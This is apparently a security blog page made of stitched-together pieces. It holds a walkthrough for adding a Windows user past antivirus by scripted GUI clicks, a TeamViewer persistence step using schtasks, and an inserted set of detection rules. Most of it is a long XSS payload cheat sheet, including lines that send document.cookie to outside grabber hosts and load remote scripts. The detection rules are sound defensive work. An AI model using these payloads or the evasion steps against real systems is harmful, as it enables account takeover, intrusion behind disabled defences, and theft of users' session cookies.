This is a test:
<img src=x onerror=confirm(CoolCat)><plaintext/onmouseover=prompt("CoolCat")>
Bypass AVs to Add Users
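Well, this is the by-product of a failed attempt to uninstall all AVs.
The basic idea is to simulate mouse clicks and keyboard input.
The following command runs the 360 uninstaller:
cd "C:/Program Files/360/360safe/" & start uninst.exe
The program's buttons have two ShadowEdge protections.
Running the py script directly to click them is refused.
Creating a bat file and launching it with start gets around this.
http://v.youku.com/v_show/id_XNDA1NzEyMzkyMA==.html?spm=a2h3j.8428770.3416059.1
As the video shows, once the simulated clicks reach the final confirmation button, it cannot be clicked.
After some research it turned out that the damn 360SPTools.exe puts a lot of obstacles in the way; a full day of work brought no breakthrough.
On second thought, why not just add a user directly? Hence this article.
To make changes and tuning easy, Python was used for this task. Not every target has a Python environment, so it has to be set up manually.
Upload the embeddable version of Python to the server directly, or download it with the script below (the script does not support https; a long time spent trying to change that got nowhere, so download the package from the official Python site and re-upload it to an http server; the script also unpacks it):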
https://github.com/TheKingOfDuck/BypassAVAddUsers/blob/master/download.php
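The pywin32 module is needed, and it cannot be installed until pip is available, so pip gets installed along the way.
pip:
start python.exe ../get-pip.py
(Lesson learned: first edit the python37._pth file in the environment directory and uncomment the #import site line before running the command, otherwise the install fails. It also fails if the command is not run through start.)
pywin32:
start python.exe -m pip install pywin32
Once these have run, all required dependencies are installed; no GUI is needed.
At first the plan was to add the user through the Control Panel, which a script can open by running control userpasswords, but the steps are rather tedious and the process is explorer, so the window is hard to control.
It can be done with lusrmgr.msc (the Local Users and Groups management tool) instead.
Once it is open, the position of the "Users" button in the middle of the screenshot has to be calculated. Testing showed that its distance from the top edge and from the left edge does not change unless someone adjusts the layout, so its coordinates can be computed from the coordinates of the window's top-left corner.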
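import win32gui

# Get the window title of MMCMainFrame
MMCMainFrame = win32gui.FindWindow("MMCMainFrame", None)
# print("#######################")
titlename = win32gui.GetWindowText(MMCMainFrame)
# print(titlename)
# print("#######################")
hWndChildList = []
# Collect the handle of every child window of MMCMainFrame
a = win32gui.EnumChildWindows(MMCMainFrame, lambda hWnd, param: param.append(hWnd), hWndChildList)
# print(a)
# Get the coordinates of the window's top-left and bottom-right corners
a, b, c, d = win32gui.GetWindowRect(MMCMainFrame)
a and b are the values needed.
# The top edge of the MMCMainFrame window is 120 coordinate points from the "Users" label; this value does not change unless the layout is adjusted
# userPosL = 237 - 117
# print(userPosL)
# userPosL = 120
# The left edge of the MMCMainFrame window is 230 coordinate points from the "Users" label; this value does not change unless the layout is adjusted
# userPosH = 1145 - 915
# print(userPosH)
# userPosH = 230
(a + 230, b + 120) is the point needed. If it is off in practice, take a screenshot with the PIL module, send it back and calculate from that.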
The rest is routine simulated clicking and simulated typing. Full code:
https://github.com/TheKingOfDuck/BypassAVAddUsers/blob/master/adduser.py
360 full suite, Safedog (安全狗), D盾 (D-Shield):
The original video is in the attached archive:
http://v.youku.com/v_show/id_XNDA1NzEyNTc1Ng==.html?spm=a2h3j.8428770.3416059.1
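(Yunsuo (云锁) has to be installed on a server, so it has not been tested yet.)
After the user is added, if the server does not have 3389 open, a single-file build of TeamViewer can be uploaded
and then started with the following command:
schtasks /create /sc minute /mo 1 /tn "cat" /tr <path to TV> /ru <created username> /rp <created password>
Use PIL to take a screenshot and read the connection ID and password:
from PIL import ImageGrab
im = ImageGrab.grab()
im.save('screenshot.png')
This way, remote desktop access is obtained without any 0day, using only legitimate files throughout.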
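Seen from the defender's side, each step described above leaves a process-creation or account-management record. The following is an added example (not code from the original post or its repository) that runs simple detection rules over constructed events; the event field names, file paths, parent processes and the user name `newadmin` are assumptions made for illustration.

```python
import re

# Constructed sample events (not real logs). "id" 1 mimics a process-creation
# record, "id" 4720 an account-creation record; field names are assumptions.
EVENTS = [
    {"id": 1, "t": 0, "image": r"C:\Windows\System32\cmd.exe",
     "cmd": 'cmd /c cd "C:/Program Files/360/360safe/" & start uninst.exe',
     "parent": r"C:\php\php-cgi.exe"},
    {"id": 1, "t": 40, "image": r"C:\Windows\Temp\py\python.exe",
     "cmd": "python.exe ../get-pip.py",
     "parent": r"C:\Windows\System32\cmd.exe"},
    {"id": 1, "t": 95, "image": r"C:\Windows\Temp\py\python.exe",
     "cmd": "python.exe -m pip install pywin32",
     "parent": r"C:\Windows\System32\cmd.exe"},
    # Benign: managed Python install doing the same pip command.
    {"id": 1, "t": 150, "image": r"C:\Program Files\Python37\python.exe",
     "cmd": "python.exe -m pip install pywin32",
     "parent": r"C:\Windows\System32\cmd.exe"},
    # Benign: administrator opens the tool from the desktop and adds a user.
    {"id": 1, "t": 200, "image": r"C:\Windows\System32\mmc.exe",
     "cmd": r'mmc.exe "C:\Windows\System32\lusrmgr.msc"',
     "parent": r"C:\Windows\explorer.exe"},
    {"id": 4720, "t": 230, "target_user": "j.smith"},
    # Scripted: the same tool started by a script host, then a new account.
    {"id": 1, "t": 300, "image": r"C:\Windows\System32\mmc.exe",
     "cmd": r'mmc.exe "C:\Windows\System32\lusrmgr.msc"',
     "parent": r"C:\Windows\Temp\py\python.exe"},
    {"id": 4720, "t": 330, "target_user": "newadmin"},
    {"id": 1, "t": 400, "image": r"C:\Windows\System32\schtasks.exe",
     "cmd": r'schtasks /create /sc minute /mo 1 /tn "cat" '
            r'/tr C:\Windows\Temp\tv.exe /ru newadmin /rp REDACTED',
     "parent": r"C:\Windows\System32\cmd.exe"},
]

INTERACTIVE_PARENTS = {"explorer.exe"}               # heuristic allowlist
MANAGED_PYTHON_DIRS = (r"c:\program files", r"c:\python")  # assumption


def base(path):
    """Lower-cased file name of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def match_process(ev):
    """Return the names of all rules a process-creation event matches."""
    hits = []
    cmd, img = ev["cmd"].lower(), ev["image"].lower()
    scripted = base(ev["parent"]) not in INTERACTIVE_PARENTS
    # AV uninstaller started through "start" by a non-interactive parent.
    if scripted and re.search(r"\bstart\s+uninst\.exe\b", cmd):
        hits.append("av-uninstaller-scripted")
    # python.exe outside managed install paths bootstrapping pip/pywin32.
    if (base(img) == "python.exe" and not img.startswith(MANAGED_PYTHON_DIRS)
            and re.search(r"get-pip\.py|pip install pywin32", cmd)):
        hits.append("portable-python-bootstrap")
    # Local Users and Groups console opened by something other than the shell.
    if scripted and "lusrmgr.msc" in cmd:
        hits.append("lusrmgr-noninteractive")
    # Scheduled task created with run-as credentials on the command line.
    if base(img) == "schtasks.exe" and re.search(
            r"/create\b.*\s/ru\s.*\s/rp\s", cmd):
        hits.append("schtasks-inline-credentials")
    return hits


def analyse(events, window=120):
    """Apply the rules in time order and correlate account creation with a
    scripted lusrmgr.msc launch seen at most `window` seconds earlier."""
    findings, last_lusrmgr = [], None
    for ev in sorted(events, key=lambda e: e["t"]):
        if ev["id"] == 1:
            for rule in match_process(ev):
                findings.append((ev["t"], rule))
                if rule == "lusrmgr-noninteractive":
                    last_lusrmgr = ev["t"]
        elif ev["id"] == 4720:
            if last_lusrmgr is not None and ev["t"] - last_lusrmgr <= window:
                findings.append(
                    (ev["t"], "account-created-after-scripted-lusrmgr:"
                     + ev["target_user"]))
    return findings


if __name__ == "__main__":
    for t, rule in analyse(EVENTS):
        print(t, rule)
```

The parent-process allowlist is a heuristic: administrators who start lusrmgr.msc from a console will also match and have to be tuned out per environment.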
test:
"/><img src=x onerror=alert('test')/>
javascript://'/</title></style></textarea></script>--><p" onclick=alert()//>/alert()/
javascript://--></script></title></style>"/</textarea>/<alert()/' onclick=alert()//>a
javascript://</title>"/</script></style></textarea/-->/<alert()/' onclick=alert()//>/
javascript://</title></style></textarea>--></script><a"//' onclick=alert()//>/alert()/
javascript://'//" --></textarea></style></script></title><b onclick= alert()//>/alert()/
javascript://</title></textarea></style></script --><li '//" '/alert()/', onclick=alert()//
javascript:alert()//--></script></textarea></style></title><a"//' onclick=alert()//>/alert()/
--></script></title></style>"/</textarea><a' onclick=alert()//>/alert()/
/</title/'/</style/</script/</textarea/--><p" onclick=alert()//>/alert()/
javascript://--></title></style></textarea></script><svg "//' onclick=alert()//
/</title/'/</style/</script/--><p" onclick=alert()//>/alert()/
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><script>alert(String.fromCharCode(88,83,83))</script>
“ onclick=alert(1)//<button ‘ onclick=alert(1)//> / alert(1)//
'">><marquee></marquee>"></plaintext></|><plaintext/onmouseover=prompt(1)><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->"></script><script>alert(1)</script>"><img/id="confirm(1)"/alt="/"src="/"onerror=eval(id&%23x29;>'">
/</title/'/</style/</script/--><p" onclick=alert()//>/alert()/*
< script > < / script>
<
<
<
<
<
<<
<<<
"><script>"</p>
<p><script>alert("XSS")</script>
<<script>alert("XSS");//<</script>
<script>alert(document.cookie)</script>
'><script>alert(document.cookie)</script>
'><script>alert(document.cookie);</script>
";alert('XSS');//
%3cscript%3ealert("XSS");%3c/script%3e
%3cscript%3ealert(document.cookie);%3c%2fscript%3e
%3Cscript%3Ealert(%22X%20SS%22);%3C/script%3E
<script>alert(document.cookie);</script>
<script>alert(document.cookie);<script>alert
<xss><script>alert('XSS')</script></vulnerable></xss>
IMG%20SRC='javascript:alert(document.cookie)'
<IMG SRC="javascript:alert('XSS')"
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=JaVaScRiPt:alert('XSS')>
<IMG SRC=javascript:alert("XSS")>
<IMG SRC=javascript:alert("'XSS'")
>
<IMG """><script>alert("XSS")</script>">
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
<IMG%20SRC='javasc ript:alert(document.cookie)'>
IMG%20SRC='%26%23x6a;avasc%26%23000010ript:a%26%23x6c;ert(document.%26%23x63;ookie)'
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=javascript:alert('XSS')>
'%3CIFRAME%20SRC=javascript:alert(%2527XSS%2527)%3E%3C/IFRAME%3E
"><script>document.location='http://your.site.com/cgi-bin/cookie.cgi?'???.cookie</script>
%22%3E%3Cscript%3Edocument%2Elocation%3D%27http%3A%2F%2Fyour%2Esite%2Ecom%2Fcgi%2Dbin%2Fcookie%2Ecgi%3F%27%20%2Bdocument%2Ecookie%3C%2Fscript%3E
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//></SCRIPT>!--<script>alert(String.fromCharCode(88,83,83))</script>=&{}
'';!--"<xss>=&{()}</xss>
<name>','')); phpinfo(); exit;/*</name>
<![CDATA[<script>var n=0;while(true){n;}</script>]]>
<![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('XSS');<![CDATA[<]]>/SCRIPT<![CDATA[>]]>
<?xml version="1.0" encoding="ISO-8859-1"?><foo>SCRIPT]]>alert('XSS');/SCRIPT]]></foo>
<xml ID=I><x><c><![CDATA[]]></c></x>
<xml id="xss"><IMG SRC="javascript:alert('XSS')"></xml></C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
<img language=vbs src=<b onerror=alert#1/1#>
Opera cross-domain set cookie 0day: document.cookie='xss=jackmasa;domain=.me.'
Reverse 401 basic auth phishing by @jackmasa POC:
document.domain='com' chrome/safari same domain suffix cross-domain trick.
Safari empty location bar bug by @jackmasa POC:
Safari location object pollution tech: by @kinugawamasato
Safari URL spoofing about://mmme.me POC:
Opera URL spoofing vuln data://mmme.me by @jackmasa POC:
Universal URL spoofing data:;//mmme.me/view/1#1,2 #firefox #safari #opera
New dom xss vector xxx.innerHTML=document.title by @0x6D6172696F
Opera data:message/rfc822 #XSS by @insertScript
IE cool expression xss
<iframe srcdoc="<svg/onload=alert(/@80vul/)>"> #chrome</p> </iframe>
IE xss filter bypass 0day :<script/%00%00v%00%00>alert(/@jackmasa/)</script> and %c0″//(%000000%0dalert(1)// #IE #0day
new XMLHttpRequest().open("GET", "data:text/html,<svg onload=alert(/@irsdl/)></svg>", false); #firefox #datauri
<h1 onerror=alert(/@0x6D6172696F/)>XSS</h1><style>*:after{content:url()}</style> #firefox
<script for= event=onerror()>alert(/@ma1/)</script><img id= src=> #IE
"<a href=javascript&.x3A;alert&(x28;1&)x29;//=>clickme #IE #xssfilter @kinugawamasato
Components.lookupMethod(self, 'alert')(1) #firefox
external.NavigateAndFind(' ',[],[]) #IE #URLredirect
<?php header('content-type:text/html;charset=utf-7-utf-8-shift_jis');?> IE decides charset as #utf-7 @hasegawayosuke
<meta http-equiv=refresh content="0 javascript:alert(1)"> #opera
<meta http-equiv=refresh content="?,javascript:alert(1)"> #chrome
<svg contentScriptType=text/vbs><script>MsgBox"@insertScript"<i> #IE9 #svg #vbscript<br>
setTimeout(['alert(/@garethheyes/)']); #chrome #safari #firefox</p>
<p><svg></ y="><x" onload=alert('@0x6D6172696F')> #svg<br>
Event.prototype[0]='@garethheyes',Event.prototype.length=1;Event.prototype.toString=[].join;onload=alert #webkit #opera<br>
URL-redirect vuln == XSS ! Location:data:text/html,<svg/onload=alert(document.domain)> #Opera @jackmasa<br>
<a href="data:application/x-x509-user-cert;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==">click</a> #Chrome #XSS @RSnake<br>
Clipboard-hijack without script and css: http://<bdo dir=rtl>elgoog</bdo>.com<br>
Opera:<style>*{-o-link:'data:text/html,<svg/onload=alert(/@garethheyes/)>';-o-link-source:current}</style><a href=1>aaa<br>
$=<>@mozilla.org/js/function</>;$::<a href="/@superevr/"><>alert</></a> #firefox<br>
Firefox cookie xss: with(document)cookie='∼≩≭≧∯≳≲≣∽≸≸∺≸∠≯≮≥≲≲≯≲∽≡≬≥≲≴∨∱∩∾',write(cookie); by @jackmasa</p>
<p><svg><script>location=<>javascript&#x3A;alert(1)<!/></script> #Firefox #JustForFun
Just don't support IE <a href=[0x0b]" onclick=alert(1)//">click</a>
<style>//<!--</style> -->*{x:expression(alert(/@jackmasa/))}//<style></style>
<input #ie="" #xss<br="" >="" value="--><body/onload=<code>alert(/ @jackmasa /)//</code>">
Input[hidden] XSS <input type=hidden style=x:expression(alert(/ @garethheyes /))
> target it.
Firefox clipboard-hijack without script and css : http://
<![<img src=x:x onerror=alert(/ @jackmasa /)//
]-->
({})[$='\143\157\156\163\164\162\165\143\164\157\162']$()
No referer : <iframe src="javascript:'<script src=>;</script>'"></iframe>
<svg><script>/**/alert(' @0x6D6172696F ')//*/</script></svg>
if(1)alert(' @jackmasa ')}{ works in firebug and webkit's console
<svg><script onlypossibleinopera:-)> alert(1) #opera by @soaj1664ashar</svg>
![if<iframe/onload=vbs::alert[:] #IE by @0x6D6172696F, @jackmasa
<svg>script/XL:href= data:;;;base64;;;;,<>啊YWx啊lc啊nQ啊oMSk啊= mix! #opera by @jackmasa</svg>
<! XSS="><img src=xx:x onerror=alert(1)//"> #Firefox #Opera #Chrome #Safari #XSS
document.body.innerHTML=('<\000\0i\000mg src=xx:x onerror=alert(1)>') #IE #XSS
header('Refresh: 0;url=javascript:alert(1)');
<script language=vbs></script><img src=xx:x onerror="::alert' @insertScript '::">
click
HTML5 entity char test
innerText DOM XSS: innerHTML=innerText
Using IE XSS filter or Chrome xss auditor to block <meta> url redirect.
jQuery 1.8 a new method: $.parseHTML('<img src=xx:X onerror=alert(1)>')
IE all version CSRF vector <img lowsrc=//blog.zsec.uk>
Timing vector <img src=//ixss.sinaapp.com/sleep.php>
Firefox data uri can inherit dom-access. <iframe src="data:D,<script>alert(top.document.body.innerHTML)</script>"><br>
IE9 <script/onload=alert(1)></script><br>
Webkit and FF <style/onload=alert(1)><br>
Firefox E4X vector alert(<xss>xs{[function::status]}s</xss>) it is said E4H would replace E4X :P<br>
IE8 document.write('<img src="<iframe/onload=alert(1)>\0">')<br>
If you want to share your cool vector, please do not hesitate to let me know :)<br>
ASP trick: ?input1=<script/&in%u2119ut1=>al%u0117rt('1')</script> by @IRSDL</p>
<p><iframe srcdoc="<svg/onload=alert(domain)>"> #chrome 20 by @0x6D6172696F<br>
try{*}catch(e if(alert(1))){} by @garethheyes<br>
ß=ss <a href="http://ß.lv">click</a> by @_cweb<br>
<a href="http://www。example。com">click</a> by @_cweb<br>
Firefox link host dom xss <a href="https://t.co/aTtzHaaG">https://t.co/aTtzHaaG</a> by @garethheyes<br>
<a href="http://www﹒example﹒com ">click</a> by @_cweb<br>
history.pushState([],[],'/xssvector') HTML5 URL spoofing!<br>
Clickjacking with history.forward() and history.back() by @lcamtuf<br>
Inertia-Clickjacking for(i=10;i>1;i--)alert(i);new ActiveXObject("WScript.shell").Run('calc.exe',1,true); by @80vul<br>
XHTML Entity Hijacking [<!ENTITY nbsp "'">] by @masa141421356<br>
Firefox <img src=javascript:while([{}]);><br>
IE <!--[if<img src=x:x onerror=alert(5)//]--> by @0x6D6172696F H5SC#115<br>
Firefox funny vector for(i=0;i<100;) find(); by @garethheyes</p>
<p><script>var location={};</script><br>
IE JSON hijack with UTF-7 json={'x':'',x:location='1'} <script src=... charset=utf-7></script><br>
Firefox <iframe src=view-source://xxxx.com>; with drag and drop</p>
<p><button form=hijack_form_id formaction=//evil style="position:absolute;left:0;top:0;width:100%;height:100%"><plaintext> form hijacking <img src='//evil by @lcamtuf<br>
Webkit <iframe> viewsource attribute: // <iframe viewsource src="//test.de"></iframe> by @0x6D6172696F
DOM clobbering:<form name=location > clobbered location object on IE.
DOM clobbering:<form name=document><image name=body> clobbered document->body
<isindex formaction=javascript:alert(1)> by @jackmasa
Classic IE backtick DOM XSS: <script>document.body.innerHTML=''</script>
Firefox click=>google by @garethheyes
click by @kkotowicz
Opera click variant base64 encode. by @jackmasa
Opera <svg><image x:href="data:image/svg-xml,%3Csvg xmlns='http://www.w3.org/2000/svg' onload='alert(1)'%3E%3C/svg%3E"> by LeverOne H5SC#88</svg>
Webkit and Opera click
FF click url trick by @jackmasa
IE <script>-{valueOf:location,toString:[].pop,0:'vbscript:alert%281%29',length:1}</script> @thornmaker , @sirdarckcat
<i/onclick=URL=name> IE less xss,20 chars. by @0x6D6172696F
click
FF no referrer by @sneak_
No dos expression vector <i style=x:expression(alert(URL=1))>
<svg><style>*{font-family:'<svg onload="alert(1)">';}</svg></style></svg>
JSLR( @garethheyes ) challenge result:
@irsdl challenge result:
Vbscript XHR by @masa141421356
XML Entity XSS by @garethheyes
Webkit <svg/onload=domain=id> cross-domain and less vector! example: (JSFiddle cross to JSBin) by @jackmasa
<style>@import//evil? >>>steal me!<<< scriptless by @garethheyes
IE <input value="<script>alert(1)</script>" ` /> by @hasegawayosuke
<iframe src="jar://html5sec.org/test.jar!/test.html"></iframe> Upload a jar file => Firefox XSS by @0x6D6172696F
JS Array Hijacking with MBCS encodings ppt by @hasegawayosuke
<meta content="0;url=http://good/[>>>inj];url=http://evil/[<<<inj]" http-equiv="refresh"> IE6-7 Inject vector by @kinugawamasato
IE UTF7 BOM XSS <link rel=stylesheet href='data:,?*%7bx:expression(alert(1))%7D' > by @garethheyes
<svg><script>a='<svg onload="alert(1)"></svg>';alert(2)</script> by @0x6D6172696F , @jackmasa</script></svg>
Opera <svg><animation x:href=javascript:alert(1)> SVG animation vector by @0x6D6172696F</svg>
<meta charset=gbk><script>a='xࠄ\';alert(1)//';</script> by @garethheyes
FF CLICK by @0x6D6172696F
<noscript> by @jackmasa H5SC:
click non-IE
click Firefox
<link href="javascript:alert(1)" rel="next"> Opera, pressing the spacebar execute!
<embed allowscriptaccess="always" code="http://businessinfo.co.uk/labs/xss/xss.swf">
"><script>alert(0)</script>
<script src="http://yoursite.com/your_files.js"></script>
<script>alert(/xss/)</script>
<script>alert(/xss/)</script>
<font style="color:expression(alert(document.cookie))">
<script language="JavaScript">alert('XSS')</script>
[url=javascript:alert('XSS');]click me[/url]
<script>alert(1);</script>
<script>alert('XSS');</script>
<script src="http://www.evilsite.org/cookiegrabber.php"></script>
<script>location.href="http://www.evilsite.org/cookiegrabber.php?cookie="??(document.cookie)</script>
<scr<script>ipt>alert('XSS');ipt>
<script>alert(String.fromCharCode(88,83,83))</script>
<style>@import'javascript:alert("XSS")';</style>
alert("XSS")'); ?>
<marquee><script>alert('XSS')</script></marquee>
window.alert("Bonjour !");
</scr<script></font></noscript>
'"></title><script>alert(1111)</script>
</textarea>'"><script>alert(document.cookie)</script>
'""><script language="JavaScript"> alert('X nS nS');</script>
</script></script><<<<script><>>>><<<script>alert(123)</script>
<input src="javascript:alert('XSS');" type="IMAGE">
'></select><script>alert(123)</script>
'>"><script src = 'http://www.site.com/XSS.js'></script>
}</style><script>a=eval;b=alert;a(b(/XSS/.source));</script>
<noalert><noscript>(123)</noscript><script>(123)</script></noalert>
<IMG SRC=JaVaScRiPt:alert('XSS')>
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=javascript:alert("RSnake says, 'XSS'")
>
<BODY onload!#$%&()*~+_.,:;?@[/|]^`=alert("XSS")>
SCRIPT/SRC="http://blog.zsec.uk/xss.js"</SCRIPT>
<<script>alert("XSS");//<</script>
<SCRIPT SRC=//blog.zsec.uk/.j>
<IMG SRC="javascript:alert('XSS')"
<iframe src=http://blog.zsec.uk/scriptlet.html <
";alert('XSS');//
</TITLE><script>alert("XSS");</script>
<input src="javascript:alert('XSS');" type="IMAGE">
<style>li {list-style-image: url("javascript:alert('XSS')");}</style>
<BODY ONLOAD=alert('XSS')>
<bgsound src="javascript:alert('XSS');"></bgsound>
<link href="javascript:alert('XSS');" rel="stylesheet">
<link href="http://blog.zsec.uk/xss.css" rel="stylesheet">
<STYLE>@import'http://blog.zsec.uk/xss.css';</STYLE>
<meta content="<http://blog.zsec.uk/xss.css>; REL=stylesheet" http-equiv="Link">
<style>BODY{-moz-binding:url("http://blog.zsec.uk/xssmoz.xml#xss")}</style>
<STYLE>@import'javascript:alert("XSS")';</STYLE>
<style>.XSS{background-image:url("javascript:alert('XSS')");}</style><A CLASS=XSS></A>
<style type="text/css">BODY{background:url("javascript:alert('XSS')")}</style>
<xss style="xss:expression(alert('XSS'))"></xss>
<xss style="behavior: url(xss.htc);">
<a href="javascript:alert(-1)">hello</a>
<a href="javascript:alert(-1)"
Hello
<a <!-- href="javascript:alert(31337);">Hello</a>
<map name="planetmap"><area a-=">" coords="0,0,145,126" href="javascript:alert(-1)" shape="rect"></map></xss>
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=javascript:alert('XSS')>
" onhover="javascript:alert(-1)"
"><script>alert('test')</script>
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//></SCRIPT>--!><script>alert(String.fromCharCode(88,83,83))</script>
<SCRIPT SRC=http://blog.zsec.uk/xss.js></SCRIPT>
<IMG SRC=JaVaScRiPt:alert('XSS')>
<IMG SRC=javascript:alert("XSS")>
<IMG SRC=javascript:alert("RSnake says, 'XSS'")
>
<IMG """><script>alert("XSS")</script>">
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=javascript:alert('XSS')>
<IMG
"
j
a
v
a
s
c
r
i
p
t
:
a
l
e
r
t
(
'
X
S
S
'
)
"
>
<SCRIPT/XSS SRC="http://blog.zsec.uk/xss.js"></SCRIPT>
<BODY onload!#$%&()*~+_.,:;?@[/|]^`=alert("XSS")>
<<script>alert("XSS");//<</script>
<SCRIPT SRC=http://blog.zsec.uk/xss.js?
<SCRIPT SRC=//blog.zsec.uk/.j>
<IMG SRC="javascript:alert('XSS')"
<iframe src=http://blog.zsec.uk/scriptlet.html <
<script>a=/XSS/
alert(a.source)</script>
";alert('XSS');//
</TITLE><script>alert("XSS");</script>
<input src="javascript:alert('XSS');" type="IMAGE">
<BODY ONLOAD=alert('XSS')>
<bgsound src="javascript:alert('XSS');"></bgsound>
<layer src="http://blog.zsec.uk/ scriptlet.html"></layer>
<link href="javascript:alert('XSS');" rel="stylesheet">
<link href="http://blog.zsec.uk/xss.css" rel="stylesheet">
<STYLE>@import'http://blog.zsec.uk/xss.css';</STYLE>
<meta content="<http://blog.zsec.uk/xss.css>; REL=stylesheet" http-equiv="Link">
<style>BODY{-moz-binding:url("http://blog.zsec.uk/xssmoz.xml#xss")}</style>
<xss style="behavior: url(xss.htc);"></xss>
<style>li {list-style-image: url("javascript:alert('XSS')");}</style>
<meta content="0;url=javascript:alert('XSS');" http-equiv="refresh">
<meta content="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K" http-equiv="refresh">
<meta content="0; URL=http://;URL=javascript:alert('XSS');" http-equiv="refresh">
<iframe src="javascript:alert('XSS');"></iframe>
<xss style="xss:expression(alert('XSS'))">
exp/<A STYLE='no\xss:noxss("**");
xss:ex/XSS*//**pression(alert("XSS"))'></xss>
<style type="text/javascript">alert('XSS');</style>
<style>.XSS{background-image:url("javascript:alert('XSS')");}</style><A CLASS=XSS></A>
<style type="text/css">BODY{background:url("javascript:alert('XSS')")}</style>
<!--[if gte IE 4]>
<script>alert('XSS');</script>
<![endif]-->
<base href="javascript:alert('XSS');//">
<object data="http://blog.zsec.uk/scriptlet.html" type="text/x-scriptlet"></object>
<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('XSS')></OBJECT>
<embed allowscriptaccess="always" src="http://blog.zsec.uk/xss.swf">
<HTML xmlns:xss>
<?import namespace="xss" implementation="http://blog.zsec.uk/xss.htc">
<XML ID=I><x><c>]]> </c></x></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
<xml id="xss"><IMG SRC="javascript:alert('XSS')"></xml>
<XML SRC="xsstest.xml" ID=I></XML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
<?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">
<?import namespace="t" implementation="#default#time2">
<t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>alert("XSS")</SCRIPT>">
</BODY></HTML>
<script src="http://blog.zsec.uk/xss.jpg"></script>
<meta content="USERID=<SCRIPT>alert('XSS')</SCRIPT>" http-equiv="Set-Cookie">
<meta content="text/html; charset=UTF-7" http-equiv="CONTENT-TYPE"> <script>alert('XSS');</script>
<script a=">" src="http://blog.zsec.uk/xss.js"></script>
<SCRIPT =">" SRC="http://blog.zsec.uk/xss.js"></SCRIPT>
<SCRIPT a=">" '' SRC="http://blog.zsec.uk/xss.js"></SCRIPT>
<SCRIPT "a='>'" SRC="http://blog.zsec.uk/xss.js"></SCRIPT>
<SCRIPT a=>
SRC="http://blog.zsec.uk/xss.js"></SCRIPT>
<script a=">'>" src="http://blog.zsec.uk/xss.js"></script>
<script>document.write("<SCRI");</script>PT SRC="http://blog.zsec.uk/xss.js"></SCRIPT>
<iframe %00 src=" javascript:prompt(1) "%00>
<svg><style>{font-family:'<iframe/onload=confirm(1)>'</style></svg>
<input/onmouseover="javaSCRIPT:confirm(1)"
<svg><scRipt %00>alert(1) {Opera}</svg>
<img/src=%00
onerror=this.onerror=confirm
%00
onerror=alert(1)
<script/ src='https://dl.dropbox.com/u/13018058/js.js' / ></script>
<ScRipT 5-0*3?=>prompt(1)</ScRipT giveanswerhere=?
iframe/src="data:text/html; base64 ,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg=="
<script /%00/>/%00/alert(1)/%00/</script /%00/
"><h1/onmouseover='\u0061lert(1)'>%00
<iframe/src="data:text/html,<svg onload=alert(1)>"
<meta content=" 1 ; JAVASCRIPT: alert(1)" http-equiv="refresh">
<svg><script xlink:href=data:,window.open('https://www.blog.zsec.uk/')></script</svg>
<svg><script x:href='https://dl.dropbox.com/u/13018058/js.js' {Opera}</svg>
<meta content="0;url=javascript:confirm(1)" http-equiv="refresh">
<iframe src=javascript:alert(document.location)>
<iframe
src="javascript:alert(1)"
;>
<a href="data:application/x-x509-user-cert;
base64
,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="
>X</a
http://www.google<script .com>alert(document.location)</script
<a href=[�]"� onmouseover=prompt(1)//">XYZ</a
<img/src=@
onerror = prompt('1')
<style/onload=prompt('XSS')
<script ^__^>alert(String.fromCharCode(49))</script
</style ><script :-(>//alert(document.location)//</script :-(
�</form><input type="date" onfocus="alert(1)">
<textarea onkeyup='\u0061\u006C\u0065\u0072\u0074(1)'>
<script //>//confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')//</script //
<iframe srcdoc="<body onload=prompt(1)>"><br>
<a href="javascript:void(0)" onmouseover=
javascript:alert(1)
>X</a></p>
<p><script <del>~>alert(0%0)</script ~</del>></p>
<p><style/onload=<!--	> alert (1)><br>
<///style///><span %2F onmousemove='alert(1)'>SPAN<br>
<img/src='<a href="http://i.imgur.com/P8mL8.jpg">http://i.imgur.com/P8mL8.jpg</a>' onmouseover=	prompt(1)<br>
"><svg><style>{-o-link-source:'<body/onload=confirm(1)>'<br>
<blink/ onmouseover=prompt(1)>OnMouseOver {Firefox & Opera}</p>
<p><marquee onstart='javascript:alert(1)'>^__^</p>
<p><a href="div/style="width:expression(confirm(1))"">div/style="width:expression(confirm(1))"</a>X</div> {IE7}</p>
<p><iframe/%00/ src=javaSCRIPT:alert(1)<br>
//<form/action=javascript:alert(document.cookie)><input/type='submit'>//<br>
/<em>iframe/src</em>/<a href="mailto:iframe/src="<iframe/src=@"/onload=prompt/*iframe/src*/">iframe/src="<iframe/src=@"/onload=prompt/*iframe/src*/</a><br>
